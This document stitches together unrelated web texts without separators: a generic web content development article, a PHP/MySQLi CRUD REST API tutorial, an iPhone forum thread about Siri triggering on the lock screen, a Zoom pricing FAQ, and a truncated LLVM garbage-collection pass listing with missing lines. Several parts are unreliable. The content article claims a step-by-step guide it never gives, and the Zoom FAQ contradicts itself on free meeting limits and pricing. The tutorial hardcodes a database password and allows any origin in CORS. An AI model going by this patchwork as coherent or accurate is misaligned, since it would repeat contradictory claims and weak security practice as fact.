Content development is one of the most important skills you can learn to make money online. There are many different ways to create content, but I'd recommend focusing on three main areas: writing, video, and graphics.

All three of these skills can be used to make money online. Once you master them, you can apply them to other areas of your business, and you may even end up making money directly from the projects you create. However, if you start with just one of these areas, you may not be able to make money online until you expand into the others. For example, you won't make much money if you only have a website and never write or produce a video.

You should also understand that creating content can be time-consuming, so consider carefully what you want to spend your time on. Some people make their living creating content every single day. Others do it part-time, and sometimes that's all they need to support themselves.

Frequently Asked Questions (FAQs)

Q: How do you get into web content development?
A: I started in web content when I was 14 and continued when I got my degree at 18. Now I work as a web content designer at an agency and freelance on the side. I am also on the editorial side, creating articles and writing blogs. I enjoy it.

Q: What do you like most about web content development?
A: Web content is a great medium because it's always changing. There are many opportunities to get your foot in the door and break through.

Q: What is your favorite part of web content development?
A: My favorite part is getting to help people and be creative.

Q: What is your least favorite part of web content development?
A: My least favorite part is the constant pressure to produce more content and keep producing new material.

Q: What's the biggest misconception about web content development?
A: The biggest misconception about web content development is that it is just writing. It is not just content; it is developing websites.
It can be anything from HTML, JavaScript, or any other scripting language. It's really what you make of it.

Q: How can someone go about getting into web content development?
A: The best way is to do it. The biggest misconception about it is that it's just writing; it's actually very technical. People think it's easy, but it takes time and dedication. If you're interested, jump in and start doing it.

Q: What's the best thing about web content development?
A: I would say it's the freedom. You are in control of the direction of your site.

Myths About Web Development

1. Creating a website takes months to years.
2. A web admin can't learn web design quickly.
3. You need a degree or certification to create and maintain websites.

Conclusion

Web content development (WCD) is a term used to describe creating web pages and content. WCD includes everything from designing a page to writing and creating images, videos, social media posts, and more. It's a growing area of online marketing and will only continue to grow in importance in the years ahead. This is why you need to know how to do it well.

If you're wondering whether web content development is the right way to go, I hope this article has convinced you. I've given you a step-by-step guide to becoming a successful web developer. But it's not just that. I've also shown you why web content development will be the path most people take in the near future.

As web content becomes increasingly important to every industry, web developers will be in high demand. And that means the competition will be fierce. To become a successful web developer, you'll need to learn everything you can now. Otherwise, you won't stand out when the competition is at its peak.
CRUD RESTful API Development in PHP MySQLi Tutorial

In this article we will look at CRUD RESTful API development in PHP with MySQLi. We will use MySQLi prepared statements to secure user input as well.

CRUD stands for Create, Read, Update and Delete. REpresentational State Transfer (REST) is an architectural style that defines a set of constraints to be used for creating web services. A REST API is a simple and flexible way of exposing web services.

Here, we will work with an items table and create the following APIs in PHP & MySQLi:

• Create Item API
• List Items API
• List Single Item Details API
• Update Item API
• Delete Item API

Let's get started.

Create Database & Table

To create the database, we can either use phpMyAdmin or run a MySQL command:

CREATE DATABASE php_applications;

Inside this database, we need to create a table.

Table: items

CREATE TABLE `items` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `description` text,
  `price` int(5) NOT NULL,
  `category_id` int(5) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

This is the items table on which we will build the CRUD APIs.

Application Folder Structure

You need to follow a folder structure to develop your CRUD-based APIs in PHP and MySQLi. Have a look at the files and folders inside this application.

Create a folder named rest-api inside your localhost directory. Inside this application folder, create class, config and items folders.

• Folder – class: Contains the class file for the CRUD operations, which uses prepared statements. Files – Items.php
• Folder – config: Contains the database configuration file, which connects you to the database and its tables. Files – Database.php
• Folder – items: This is your module folder; items are the subject of the CRUD operations. Files – create.php, delete.php, read.php, update.php
• .htaccess: Makes your URLs SEO friendly by removing the .php extension from URLs.

Database Configuration

Open Database.php from the /config folder and add these lines of code to it:

<?php
class Database{
    private $host = "localhost";
    private $user = "admin";
    private $password = "Admin@123";
    private $database = "php_applications";

    public function getConnection(){
        $conn = new mysqli($this->host, $this->user, $this->password, $this->database);
        if($conn->connect_error){
            die("Error failed to connect to MySQL: " . $conn->connect_error);
        } else {
            return $conn;
        }
    }
}

This handles database connectivity. We will create an instance of this class wherever it is used.

API Class with CRUD Methods

Open Items.php from the /class folder and add these lines of code to it:

<?php
class Items{
    private $itemsTable = "items";
    public $id;
    public $name;
    public $description;
    public $price;
    public $category_id;
    private $conn;

    public function __construct($db){
        $this->conn = $db;
    }

    function read(){
        if($this->id) {
            $stmt = $this->conn->prepare("SELECT * FROM ".$this->itemsTable."
WHERE id = ?"); $stmt->bind_param("i", $this->id); } else { $stmt = $this->conn->prepare("SELECT * FROM ".$this->itemsTable); } $stmt->execute(); $result = $stmt->get_result(); return $result; } function create(){ $stmt = $this->conn->prepare(" INSERT INTO ".$this->itemsTable."(name, description, price, category_id) VALUES(?,?,?,?)"); $this->name = htmlspecialchars(strip_tags($this->name)); $this->description = htmlspecialchars(strip_tags($this->description)); $this->price = htmlspecialchars(strip_tags($this->price)); $this->category_id = htmlspecialchars(strip_tags($this->category_id)); $stmt->bind_param("ssii", $this->name, $this->description, $this->price, $this->category_id); if($stmt->execute()){ return true; } return false; } function update(){ $stmt = $this->conn->prepare(" UPDATE ".$this->itemsTable." SET name= ?, description = ?, price = ?, category_id = ? WHERE id = ?"); $this->id = htmlspecialchars(strip_tags($this->id)); $this->name = htmlspecialchars(strip_tags($this->name)); $this->description = htmlspecialchars(strip_tags($this->description)); $this->price = htmlspecialchars(strip_tags($this->price)); $this->category_id = htmlspecialchars(strip_tags($this->category_id)); $stmt->bind_param("ssiii", $this->name, $this->description, $this->price, $this->category_id, $this->id); if($stmt->execute()){ return true; } return false; } function delete(){ $stmt = $this->conn->prepare(" DELETE FROM ".$this->itemsTable." WHERE id = ?"); $this->id = htmlspecialchars(strip_tags($this->id)); $stmt->bind_param("i", $this->id); if($stmt->execute()){ return true; } return false; } } Inside this API class, we have all methods of CRUD operation. Setup – Create API Open create.php file from /items folder. Open this file and write this code into it. <?php header("Access-Control-Allow-Origin: *"); header("Content-Type: application/json; charset=UTF-8"); header("Access-Control-Allow-Methods: POST"); header("Access-Control-Max-Age: 3600"); header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With"); include_once '../config/Database.php'; include_once '../class/Items.php'; $database = new Database(); $db = $database->getConnection(); $items = new Items($db); $data = json_decode(file_get_contents("php://input")); if(!empty($data->name) && !empty($data->description) && !empty($data->price) && !empty($data->category_id)){ $items->name = $data->name; $items->description = $data->description; $items->price = $data->price; $items->category_id = $data->category_id; if($items->create()){ http_response_code(201); echo json_encode(array("message" => "Item was created.")); } else{ http_response_code(503); echo json_encode(array("message" => "Unable to create item.")); } }else{ http_response_code(400); echo json_encode(array("message" => "Unable to create item. Data is incomplete.")); } This API file used to create Items inside database table. Setup – Read API Open read.php file from /items folder. Open this file and write this code into it. <?php header("Access-Control-Allow-Origin: *"); header("Content-Type: application/json; charset=UTF-8"); include_once '../config/Database.php'; include_once '../class/Items.php'; $database = new Database(); $db = $database->getConnection(); $items = new Items($db); $items->id = (isset($_GET['id']) && $_GET['id']) ? 
    $_GET['id'] : '0';

$result = $items->read();

if($result->num_rows > 0){
    $itemRecords = array();
    $itemRecords["items"] = array();

    while ($item = $result->fetch_assoc()) {
        extract($item);
        $itemDetails = array(
            "id" => $id,
            "name" => $name,
            "description" => $description,
            "price" => $price,
            "category_id" => $category_id
        );
        array_push($itemRecords["items"], $itemDetails);
    }

    http_response_code(200);
    echo json_encode($itemRecords);
}else{
    http_response_code(404);
    echo json_encode(array("message" => "No item found."));
}

This API file is used to read all items, as well as a single item's details, from the database table.

Setup – Update API

Open update.php from the /items folder and write this code into it:

<?php
header("Access-Control-Allow-Origin: *");
header("Content-Type: application/json; charset=UTF-8");
header("Access-Control-Allow-Methods: POST");
header("Access-Control-Max-Age: 3600");
header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With");

include_once '../config/Database.php';
include_once '../class/Items.php';

$database = new Database();
$db = $database->getConnection();

$items = new Items($db);

$data = json_decode(file_get_contents("php://input"));

if(!empty($data->id) && !empty($data->name) && !empty($data->description) && !empty($data->price) && !empty($data->category_id)){
    $items->id = $data->id;
    $items->name = $data->name;
    $items->description = $data->description;
    $items->price = $data->price;
    $items->category_id = $data->category_id;

    if($items->update()){
        http_response_code(200);
        echo json_encode(array("message" => "Item was updated."));
    }else{
        http_response_code(503);
        echo json_encode(array("message" => "Unable to update items."));
    }
} else {
    http_response_code(400);
    echo json_encode(array("message" => "Unable to update items. Data is incomplete."));
}

This API file is used to update an item's details in the database table, on the basis of the item id.

Setup – Delete API

Open delete.php from the /items folder and write this code into it:

<?php
header("Access-Control-Allow-Origin: *");
header("Content-Type: application/json; charset=UTF-8");
header("Access-Control-Allow-Methods: POST");
header("Access-Control-Max-Age: 3600");
header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With");

include_once '../config/Database.php';
include_once '../class/Items.php';

$database = new Database();
$db = $database->getConnection();

$items = new Items($db);

$data = json_decode(file_get_contents("php://input"));

if(!empty($data->id)) {
    $items->id = $data->id;

    if($items->delete()){
        http_response_code(200);
        echo json_encode(array("message" => "Item was deleted."));
    } else {
        http_response_code(503);
        echo json_encode(array("message" => "Unable to delete item."));
    }
} else {
    http_response_code(400);
    echo json_encode(array("message" => "Unable to delete items. Data is incomplete."));
}

This API file is used to delete an item from the database table, on the basis of the item id.

Setup – .htaccess (SEO Friendly URLs)

Open the .htaccess file from the /items folder and write this code into it:

RewriteEngine On    # Turn on the rewriting engine
RewriteRule ^read$ read.php [NC,L]
RewriteRule ^read/([0-9_-]*)$ read.php?id=$1 [NC,L]
RewriteRule ^create$ create.php [NC,L]
RewriteRule ^update$ update.php [NC,L]
RewriteRule ^delete$ delete.php [NC,L]

With this code we remove the .php extension from the file names in URLs. This helps to generate SEO friendly URLs.
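Note: the rules above only take effect if Apache has the rewrite module enabled and is allowed to read .htaccess files for this directory. That step is not covered above, so here is a minimal sketch assuming a stock Apache install with the application under /var/www/html/rest-api (the path and the Debian-style command are illustrative; adjust them to your environment):

# Enable the rewrite module (Debian/Ubuntu style), then restart Apache:
#   sudo a2enmod rewrite && sudo service apache2 restart

# In the server or virtual host configuration, permit .htaccess overrides
# for the application directory (path is an assumption for illustration):
<Directory "/var/www/html/rest-api">
    AllowOverride All
    Require all granted
</Directory>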
Application Testing

Now we will test the CRUD APIs. For testing we will use the POSTMAN tool.

Create Item API

URL – http://localhost/rest-api/items/create
Method – POST
Header
Content-Type:application/json
Accept:application/json
Body
{
    "name": "Toshiba Sewing Machine",
    "description": "Its best & affordable machine",
    "price": 20000,
    "category_id": 5
}

Read All Items API

URL – http://localhost/rest-api/items/read
Method – GET

Read Single Item API

URL – http://localhost/rest-api/items/read?id=1
Method – GET

Update Item API

URL – http://localhost/rest-api/items/update
Method – POST
Header
Content-Type:application/json
Accept:application/json
Body
{
    "id": 3,
    "name": "Product 3 - Update",
    "description": "Sample Product 3 - Update",
    "price": 5000,
    "category_id": 3
}

Delete Item API

URL – http://localhost/rest-api/items/delete
Method – POST
Header
Content-Type:application/json
Accept:application/json
Body
{
    "id": 3
}

We hope this article helped you learn about CRUD RESTful API development in PHP MySQLi in a detailed way.
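As a final aside, if you would rather exercise the APIs from code than from POSTMAN, a small PHP script using the cURL extension works just as well. The sketch below posts to the Create Item API; the file name test-create.php is hypothetical, and it assumes the same localhost URL used in the testing section above:

<?php
// test-create.php (hypothetical helper) - posts a JSON body to the Create Item API.
$payload = json_encode(array(
    "name"        => "Toshiba Sewing Machine",
    "description" => "Its best & affordable machine",
    "price"       => 20000,
    "category_id" => 5
));

$ch = curl_init("http://localhost/rest-api/items/create");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    "Content-Type: application/json",
    "Accept: application/json"
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
$status   = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// On success the API responds with HTTP 201 and {"message":"Item was created."}
echo "HTTP " . $status . ": " . $response . PHP_EOL;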
Turning Siri off?

Discussion in 'iPhone 4S' started by spinfreak, Oct 17, 2011.

1. spinfreak: I know it's possible to turn Siri off at the lock screen when using a passcode, but is it possible to turn it off at the lock screen without having a passcode enabled? I carry my phone in my pocket, and Siri has been activated numerous times now. I don't want to turn Siri off altogether, but I also don't want to have to start using a passcode. Thanks.

2. spinfreak: Hello... anybody out there? Lol

3. Skull One: I actually spent five minutes trying to figure this situation out. And no, I could not find a way to overcome that issue.

4. ArmySteeler: It is most likely that your home button is being pressed and held by some other object in your pocket. To prevent this:
1. Never place other objects in the same pocket as your iPhone.
2. Always place the screen of your iPhone towards your body when it is in a pocket, to prevent things outside your pocket from pressing the home button.
3. Use a case which includes a cover for the front of your iPhone.
Any or all of these will reduce or eliminate the problem and protect your screen from damage.

5. ArmySteeler: It is also possible, in certain situations, that Siri may activate without the home button being pressed. This can only happen if your iPhone is awake (the top button has been accidentally tapped while the iPhone was asleep in your pocket). To prevent this, turn off the "Raise to Speak" setting in SETTINGS > GENERAL > SIRI (the last setting option).

6. spinfreak: ArmySteeler... thanks for the info, but I'm actually aware of those situations already. I was just hoping there was a way to turn Siri off completely when the phone is on the lock screen. I'm sure I'm not the only one with this issue. If there isn't a way to do this now (which there doesn't seem to be), hopefully Apple will add this option in a future update.

7. iJeff: I understand your issue, but it would be useless if you were able to turn it off, not to mention a pain every time you go to use it and have to turn it back on. Maybe you should invest in a case and carry it on your hip. Just a thought.

8. spinfreak: There is an option to turn it off altogether, but I'm not looking to do that. I just want it off when the phone is off (on the lock screen). I only want Siri to be able to be used when the phone is on (awake). To me, that should have been an obvious option for them to include. What's funny/weird is that if the phone is on/awake and you set it down with the screen facing down, Siri also activates then.
9. idave23: Mine doesn't. :confused:

10. JLadd4420: If Siri is activating when you set the phone down on the screen, I bet you have the feature enabled for Siri to activate when you put the phone up to your ear. It probably doesn't recognize that it's on a table and not your ear.

11. f4780y: If it is activating face down on a table, it sounds to me like you may have an oversensitive or malfunctioning proximity sensor... Mine has never triggered by accident without being raised to my ear.
Question: How Long Can I Use Zoom For Free?

Is Zoom unlimited and free right now?
Zoom's free tier allows people to be in a meeting for up to 40 minutes.

Why does Zoom kick me out after 40 minutes?
If you are using a Pro account type and you receive a notification that your meeting will end in x amount of minutes (timing out), you may not be logged in with the email that is associated with your Pro account. In that case the meeting will have a 40-minute restriction.

What are the disadvantages of Zoom?
Here are the cons of using Zoom:
• Too many subscriptions and add-ons. Zoom is a subscription-based service that is reasonably priced at starter levels.
• Lack of comment control.
• Zoombombing.
• HD video is not the standard.
• You need to download an app.
• Inconsistent cloud file sizes.

Is Zoom better than FaceTime?
Even the free version of Zoom has much more functionality than FaceTime. HD video/audio, multiple view options, screen sharing, and 100-participant support are all included in the Zoom free plan. The only main downside with Zoom is the 40-minute limitation, but this can be fixed by paying for a subscription.

Is Zoom better than Skype?
Zoom and Skype are the closest competitors of their kind. They are both great options, but Zoom is the more complete solution for business users and work-related purposes. If the few extra features Zoom has over Skype don't matter much to you, then the real difference will be in pricing.

Is Zoom still free for over 40 minutes?
The free version of Zoom limits meetings to just 40 minutes. In order to resume the meeting, users either have to pay or restart it all over again. The video conferencing platform will be removing the 40-minute limit on free Zoom accounts for all meetings globally for several upcoming special occasions.

How do I see everyone on Zoom?
Android | iOS: Start or join a meeting. By default, the Zoom mobile app displays the Active Speaker View. If one or more participants join the meeting, you will see a video thumbnail in the bottom-right corner. Swipe left from the Active Speaker View to switch to Gallery View.

Is your first Zoom meeting unlimited time?
Zoom offers a full-featured Basic plan for free with unlimited meetings. Both Basic and Pro plans allow for unlimited 1-1 meetings, and each meeting can have a maximum duration of 24 hours. The Basic plan has a 40-minute time limit on each meeting with three or more total participants.

Is Zoom still free for teachers?
In response to this crisis, Zoom is lifting the meeting time restriction on free accounts. This enables robust collaboration and engagement tools for any school or district, K-12. Administrators, teachers, parents and students have access to unlimited meetings for up to 100 participants.

What is SSO in Zoom?
Single sign-on allows you to log in using your company credentials. Zoom single sign-on (SSO) is based on SAML 2.0. Once Zoom receives a SAML response from the Identity Provider (IdP), Zoom checks if the user exists. If the user does not exist, Zoom creates a user account automatically with the received name ID.

How long can a free Zoom meeting run?
24 hours. Zoom offers a full-featured Basic plan for free with unlimited meetings. Try Zoom for as long as you like – there is no trial period. Both Basic and Pro plans allow for unlimited 1-1 meetings, and each meeting can have a maximum duration of 24 hours.

How do you get around the 40-minute limit on Zoom?
A Zoom Basic license only allows group meetings up to 40 minutes, but a typical course session lasts longer than that! How can instructors use Zoom to teach with that limit? The answer is simple: after the meeting times out, users may restart the meeting after waiting one minute by clicking on the same meeting link.

What happens if you go over 40 minutes on Zoom?
The meeting times out at 40 minutes. If only one person remains in the meeting, the meeting will end 40 minutes later if no one else joins.

How much is Zoom monthly?
Zoom pricing:
• Basic – Free
• Pro – $14.99 per host per month
• Business – $19.99 per host per month
• Enterprise – $19.99 per host per month

Is Zoom owned by Skype?
No. Soon after lockdown was announced, Skype found itself out of sight and out of mind, replaced by an app half its age: Zoom. To understand that, you need to go back to May 2011, when Microsoft acquired Skype for $8.5 billion.

What are the disadvantages of Google Meet?
You can only access Meet via the Google Chrome web browser. This isn't a huge obstacle, but it can be annoying if you use another browser. Also, it might create delays for participants who are unfamiliar with Meet.

How do you get unlimited minutes on Zoom?
You get [virtually] unlimited minutes on Zoom by having a host who is paying for a plan. The free plan can only host a group meeting for up to 40 minutes before being disconnected. But a paid plan can host a meeting for 1,440 minutes (24 hours), then immediately start a new meeting that will last for another 24 hours.
__label__pos
0.97361
LLVM  10.0.0svn RewriteStatepointsForGC.cpp Go to the documentation of this file. 1 //===- RewriteStatepointsForGC.cpp - Make GC relocations explicit ---------===// 2 // 3 // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. 4 // See https://llvm.org/LICENSE.txt for license information. 5 // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception 6 // 7 //===----------------------------------------------------------------------===// 8 // 9 // Rewrite call/invoke instructions so as to make potential relocations 10 // performed by the garbage collector explicit in the IR. 11 // 12 //===----------------------------------------------------------------------===// 13  15  16 #include "llvm/ADT/ArrayRef.h" 17 #include "llvm/ADT/DenseMap.h" 18 #include "llvm/ADT/DenseSet.h" 19 #include "llvm/ADT/MapVector.h" 20 #include "llvm/ADT/None.h" 21 #include "llvm/ADT/Optional.h" 22 #include "llvm/ADT/STLExtras.h" 23 #include "llvm/ADT/SetVector.h" 24 #include "llvm/ADT/SmallSet.h" 25 #include "llvm/ADT/SmallVector.h" 26 #include "llvm/ADT/StringRef.h" 31 #include "llvm/IR/Argument.h" 32 #include "llvm/IR/Attributes.h" 33 #include "llvm/IR/BasicBlock.h" 34 #include "llvm/IR/CallingConv.h" 35 #include "llvm/IR/Constant.h" 36 #include "llvm/IR/Constants.h" 37 #include "llvm/IR/DataLayout.h" 38 #include "llvm/IR/DerivedTypes.h" 39 #include "llvm/IR/Dominators.h" 40 #include "llvm/IR/Function.h" 41 #include "llvm/IR/IRBuilder.h" 42 #include "llvm/IR/InstIterator.h" 43 #include "llvm/IR/InstrTypes.h" 44 #include "llvm/IR/Instruction.h" 45 #include "llvm/IR/Instructions.h" 46 #include "llvm/IR/IntrinsicInst.h" 47 #include "llvm/IR/Intrinsics.h" 48 #include "llvm/IR/LLVMContext.h" 49 #include "llvm/IR/MDBuilder.h" 50 #include "llvm/IR/Metadata.h" 51 #include "llvm/IR/Module.h" 52 #include "llvm/IR/Statepoint.h" 53 #include "llvm/IR/Type.h" 54 #include "llvm/IR/User.h" 55 #include "llvm/IR/Value.h" 56 #include "llvm/IR/ValueHandle.h" 57 #include "llvm/Pass.h" 58 #include "llvm/Support/Casting.h" 60 #include "llvm/Support/Compiler.h" 61 #include "llvm/Support/Debug.h" 64 #include "llvm/Transforms/Scalar.h" 68 #include <algorithm> 69 #include <cassert> 70 #include <cstddef> 71 #include <cstdint> 72 #include <iterator> 73 #include <set> 74 #include <string> 75 #include <utility> 76 #include <vector> 77  78 #define DEBUG_TYPE "rewrite-statepoints-for-gc" 79  80 using namespace llvm; 81  82 // Print the liveset found at the insert location 83 static cl::opt<bool> PrintLiveSet("spp-print-liveset", cl::Hidden, 84  cl::init(false)); 85 static cl::opt<bool> PrintLiveSetSize("spp-print-liveset-size", cl::Hidden, 86  cl::init(false)); 87  88 // Print out the base pointers for debugging 89 static cl::opt<bool> PrintBasePointers("spp-print-base-pointers", cl::Hidden, 90  cl::init(false)); 91  92 // Cost threshold measuring when it is profitable to rematerialize value instead 93 // of relocating it 94 static cl::opt<unsigned> 95 RematerializationThreshold("spp-rematerialization-threshold", cl::Hidden, 96  cl::init(6)); 97  98 #ifdef EXPENSIVE_CHECKS 99 static bool ClobberNonLive = true; 100 #else 101 static bool ClobberNonLive = false; 102 #endif 103  104 static cl::opt<bool, true> ClobberNonLiveOverride("rs4gc-clobber-non-live", 105  cl::location(ClobberNonLive), 106  cl::Hidden); 107  108 static cl::opt<bool> 109  AllowStatepointWithNoDeoptInfo("rs4gc-allow-statepoint-with-no-deopt-info", 110  cl::Hidden, cl::init(true)); 111  112 /// The IR fed into RewriteStatepointsForGC may have had attributes 
and 113 /// metadata implying dereferenceability that are no longer valid/correct after 114 /// RewriteStatepointsForGC has run. This is because semantically, after 115 /// RewriteStatepointsForGC runs, all calls to gc.statepoint "free" the entire 116 /// heap. stripNonValidData (conservatively) restores 117 /// correctness by erasing all attributes in the module that externally imply 118 /// dereferenceability. Similar reasoning also applies to the noalias 119 /// attributes and metadata. gc.statepoint can touch the entire heap including 120 /// noalias objects. 121 /// Apart from attributes and metadata, we also remove instructions that imply 122 /// constant physical memory: llvm.invariant.start. 123 static void stripNonValidData(Module &M); 124  126  128  ModuleAnalysisManager &AM) { 129  bool Changed = false; 130  auto &FAM = AM.getResult<FunctionAnalysisManagerModuleProxy>(M).getManager(); 131  for (Function &F : M) { 132  // Nothing to do for declarations. 133  if (F.isDeclaration() || F.empty()) 134  continue; 135  136  // Policy choice says not to rewrite - the most common reason is that we're 137  // compiling code without a GCStrategy. 139  continue; 140  141  auto &DT = FAM.getResult<DominatorTreeAnalysis>(F); 142  auto &TTI = FAM.getResult<TargetIRAnalysis>(F); 143  auto &TLI = FAM.getResult<TargetLibraryAnalysis>(F); 144  Changed |= runOnFunction(F, DT, TTI, TLI); 145  } 146  if (!Changed) 147  return PreservedAnalyses::all(); 148  149  // stripNonValidData asserts that shouldRewriteStatepointsIn 150  // returns true for at least one function in the module. Since at least 151  // one function changed, we know that the precondition is satisfied. 153  157  return PA; 158 } 159  160 namespace { 161  162 class RewriteStatepointsForGCLegacyPass : public ModulePass { 164  165 public: 166  static char ID; // Pass identification, replacement for typeid 167  168  RewriteStatepointsForGCLegacyPass() : ModulePass(ID), Impl() { 171  } 172  173  bool runOnModule(Module &M) override { 174  bool Changed = false; 175  for (Function &F : M) { 176  // Nothing to do for declarations. 177  if (F.isDeclaration() || F.empty()) 178  continue; 179  180  // Policy choice says not to rewrite - the most common reason is that 181  // we're compiling code without a GCStrategy. 183  continue; 184  185  TargetTransformInfo &TTI = 186  getAnalysis<TargetTransformInfoWrapperPass>().getTTI(F); 187  const TargetLibraryInfo &TLI = 188  getAnalysis<TargetLibraryInfoWrapperPass>().getTLI(F); 189  auto &DT = getAnalysis<DominatorTreeWrapperPass>(F).getDomTree(); 190  191  Changed |= Impl.runOnFunction(F, DT, TTI, TLI); 192  } 193  194  if (!Changed) 195  return false; 196  197  // stripNonValidData asserts that shouldRewriteStatepointsIn 198  // returns true for at least one function in the module. Since at least 199  // one function changed, we know that the precondition is satisfied. 201  return true; 202  } 203  204  void getAnalysisUsage(AnalysisUsage &AU) const override { 205  // We add and rewrite a bunch of instructions, but don't really do much 206  // else. We could in theory preserve a lot more analyses here. 
210  } 211 }; 212  213 } // end anonymous namespace 214  216  218  return new RewriteStatepointsForGCLegacyPass(); 219 } 220  221 INITIALIZE_PASS_BEGIN(RewriteStatepointsForGCLegacyPass, 222  "rewrite-statepoints-for-gc", 223  "Make relocations explicit at statepoints", false, false) 226 INITIALIZE_PASS_END(RewriteStatepointsForGCLegacyPass, 227  "rewrite-statepoints-for-gc", 228  "Make relocations explicit at statepoints", false, false) 229  230 namespace { 231  233  /// Values defined in this block. 235  236  /// Values used in this block (and thus live); does not included values 237  /// killed within this block. 239  240  /// Values live into this basic block (i.e. used by any 241  /// instruction in this basic block or ones reachable from here) 243  244  /// Values live out of this basic block (i.e. live into 245  /// any successor block) 247 }; 248  249 // The type of the internal cache used inside the findBasePointers family 250 // of functions. From the callers perspective, this is an opaque type and 251 // should not be inspected. 252 // 253 // In the actual implementation this caches two relations: 254 // - The base relation itself (i.e. this pointer is based on that one) 255 // - The base defining value relation (i.e. before base_phi insertion) 256 // Generally, after the execution of a full findBasePointer call, only the 257 // base relation will remain. Internally, we add a mixture of the two 258 // types, then update all the second type to the first type 263  265  /// The set of values known to be live across this safepoint 267  268  /// Mapping from live pointers to a base-defining-value 270  271  /// The *new* gc.statepoint instruction itself. This produces the token 272  /// that normal path gc.relocates and the gc.result are tied to. 274  275  /// Instruction to which exceptional gc relocates are attached 276  /// Makes it easier to iterate through them during relocationViaAlloca. 278  279  /// Record live values we are rematerialized instead of relocating. 280  /// They are not included into 'LiveSet' field. 281  /// Maps rematerialized copy to it's original value. 283 }; 284  285 } // end anonymous namespace 286  288  Optional<OperandBundleUse> DeoptBundle = 290  291  if (!DeoptBundle.hasValue()) { 293  "Found non-leaf call without deopt info!"); 294  return None; 295  } 296  297  return DeoptBundle.getValue().Inputs; 298 } 299  300 /// Compute the live-in set for every basic block in the function 301 static void computeLiveInValues(DominatorTree &DT, Function &F, 302  GCPtrLivenessData &Data); 303  304 /// Given results from the dataflow liveness computation, find the set of live 305 /// Values at a particular instruction. 306 static void findLiveSetAtInst(Instruction *inst, GCPtrLivenessData &Data, 307  StatepointLiveSetTy &out); 308  309 // TODO: Once we can get to the GCStrategy, this becomes 310 // Optional<bool> isGCManagedPointer(const Type *Ty) const override { 311  312 static bool isGCPointerType(Type *T) { 313  if (auto *PT = dyn_cast<PointerType>(T)) 314  // For the sake of this example GC, we arbitrarily pick addrspace(1) as our 315  // GC managed heap. We know that a pointer into this heap needs to be 316  // updated and that no other pointer does. 317  return PT->getAddressSpace() == 1; 318  return false; 319 } 320  321 // Return true if this type is one which a) is a gc pointer or contains a GC 322 // pointer and b) is of a type this code expects to encounter as a live value. 
323 // (The insertion code will assert that a type which matches (a) and not (b) 324 // is not encountered.) 326  // We fully support gc pointers 327  if (isGCPointerType(T)) 328  return true; 329  // We partially support vectors of gc pointers. The code will assert if it 330  // can't handle something. 331  if (auto VT = dyn_cast<VectorType>(T)) 332  if (isGCPointerType(VT->getElementType())) 333  return true; 334  return false; 335 } 336  337 #ifndef NDEBUG 338 /// Returns true if this type contains a gc pointer whether we know how to 339 /// handle that type or not. 340 static bool containsGCPtrType(Type *Ty) { 341  if (isGCPointerType(Ty)) 342  return true; 343  if (VectorType *VT = dyn_cast<VectorType>(Ty)) 344  return isGCPointerType(VT->getScalarType()); 345  if (ArrayType *AT = dyn_cast<ArrayType>(Ty)) 346  return containsGCPtrType(AT->getElementType()); 347  if (StructType *ST = dyn_cast<StructType>(Ty)) 348  return llvm::any_of(ST->elements(), containsGCPtrType); 349  return false; 350 } 351  352 // Returns true if this is a type which a) is a gc pointer or contains a GC 353 // pointer and b) is of a type which the code doesn't expect (i.e. first class 354 // aggregates). Used to trip assertions. 355 static bool isUnhandledGCPointerType(Type *Ty) { 356  return containsGCPtrType(Ty) && !isHandledGCPointerType(Ty); 357 } 358 #endif 359  360 // Return the name of the value suffixed with the provided value, or if the 361 // value didn't have a name, the default value specified. 362 static std::string suffixed_name_or(Value *V, StringRef Suffix, 363  StringRef DefaultName) { 364  return V->hasName() ? (V->getName() + Suffix).str() : DefaultName.str(); 365 } 366  367 // Conservatively identifies any definitions which might be live at the 368 // given instruction. The analysis is performed immediately before the 369 // given instruction. Values defined by that instruction are not considered 370 // live. Values used by that instruction are considered live. 372  DominatorTree &DT, GCPtrLivenessData &OriginalLivenessData, CallBase *Call, 373  PartiallyConstructedSafepointRecord &Result) { 374  StatepointLiveSetTy LiveSet; 375  findLiveSetAtInst(Call, OriginalLivenessData, LiveSet); 376  377  if (PrintLiveSet) { 378  dbgs() << "Live Variables:\n"; 379  for (Value *V : LiveSet) 380  dbgs() << " " << V->getName() << " " << *V << "\n"; 381  } 382  if (PrintLiveSetSize) { 383  dbgs() << "Safepoint For: " << Call->getCalledValue()->getName() << "\n"; 384  dbgs() << "Number live values: " << LiveSet.size() << "\n"; 385  } 386  Result.LiveSet = LiveSet; 387 } 388  389 static bool isKnownBaseResult(Value *V); 390  391 namespace { 392  393 /// A single base defining value - An immediate base defining value for an 394 /// instruction 'Def' is an input to 'Def' whose base is also a base of 'Def'. 395 /// For instructions which have multiple pointer [vector] inputs or that 396 /// transition between vector and scalar types, there is no immediate base 397 /// defining value. The 'base defining value' for 'Def' is the transitive 398 /// closure of this relation stopping at the first instruction which has no 399 /// immediate base defining value. The b.d.v. might itself be a base pointer, 400 /// but it can also be an arbitrary derived pointer. 401 struct BaseDefiningValueResult { 402  /// Contains the value which is the base defining value. 403  Value * const BDV; 404  405  /// True if the base defining value is also known to be an actual base 406  /// pointer. 
